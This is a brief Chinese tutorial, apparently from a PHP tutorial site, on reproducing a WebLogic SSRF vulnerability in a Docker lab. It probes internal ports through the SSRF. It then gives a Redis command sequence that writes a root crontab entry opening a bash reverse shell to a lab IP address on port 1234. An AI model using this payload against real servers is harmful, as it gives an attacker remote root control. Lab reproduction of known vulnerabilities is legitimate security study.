docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html
访问7001端口
发现是个连接,这就可能存在ssrf了
访问不存在的端口返回 could not connect over HTTP
访问存在的端口返回状态码
访问内网
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save
以上是如何实现Weblogic SSRF漏洞复现的详细内容。更多信息请关注PHP中文网其他相关文章!